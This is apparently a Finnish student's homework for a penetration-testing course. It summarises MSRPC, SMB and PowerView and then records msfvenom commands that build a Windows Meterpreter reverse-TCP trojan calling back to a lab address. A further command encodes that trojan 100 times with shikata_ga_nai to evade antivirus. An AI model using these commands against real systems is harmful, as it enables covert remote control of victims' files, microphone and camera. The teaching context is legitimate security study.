Kurssisivu: https://terokarvinen.com/2021/penetration-testing-course-2021-autumn/
Tehtävänannot: https://terokarvinen.com/2021/penetration-testing-course-2021-autumn/#h7-final-countdown
z) Tiivistelmät
0xffsec Handbook 2021: MSRPC (Microsoft Remote Procedure Call)
- MSRPC on prosessien välinen kommunikaatiomekanismi, jonka tarkoituksena tarjota yhteinen käyttöliittymä sovellusten välille.
- Mahdollistaa client/palvelinohjelmiston viestinnän.
- Windowsissa palvelinohjelmistot ovat avoimena RPC:n kautta.
0xffsec Handbook 2021: SMB (Server Message Block)
- SMB on verkkoyhteysprotokolla, joka mahdollistaa pääsyn tiedostoihin, tulostimiin ja sarjaportteihin verkon solmujen välillä.
- Tarjoaa myös todennettuja IPC (prosessien välinen viestintä) mekanismeja.
HackTricks 2021: PowerView
- Luetuilta komentoja, mitä PowerViewillä pystyy tekemään.
- PowerViewillä saa tietoja muun muassa domainista, käyttäjistä, ryhmistä ja tietokoneista Active Directoryssa.
e) Rottia. Tee troijan hevonen, joka asentaa vihamielisen etäkäyttöohjelman (RAT, remote access trojan)
Kuvassa troijalaisen teko aloitettu listamaalla kaikki mahdolliset payloadit komennolla: msfvenom -l payloads.
Kuvassa valittu payloadiksi windows/meterpreter/reverse_tcp, joka mahdollistaa Windows-kohteen hallitsemista etänä muun muassa tiedostoja, mikrofonia ja kameraa. Listattu asetukset komennolla: msfvenom –list-options -p windows/meterpreter/reverse_tcp. LHOST on tyhjänä, ja yleensä siinä on oma IP-osoite.
Kuvassa generoitu troijalainen komennolla: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.1 LPORT=4444 -f exe > trojan1.exe. -p optiolla täsmennettiin valittu payloadi, LHOST:iin oma IP-osoite, LPORT:iin edellisestä kuvasta LPORT 4444, -f optiolla täsmennetty tiedostotyyppi .exe ja trojan1.exe on tiedosto, joka luodaan troijalaiseksi.
Jotta virustorjunta ei huomaa exploittia, pitää se salata. Kuvassa listattu mahdolliset salaukset komennolla msfvenom -l encoders.
Valittu salaustyypiksi x86/shikata_ga_nai, ja kuvassa salattu troijalainen 100 kertaa komennolla msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.1 LPORT=4444 x86/shikata_ga_nai -i 100 -f exe > encryptedtrojan.exe. Ja lopputuloksena on luodut troijalaistiedostot encryptrojan.exe (salattu) ja trojan1.exe.
Tehtävässä käytetty apuna lähdettä: https://livelinuxusb.com/create-trojan-virus-kali-linux/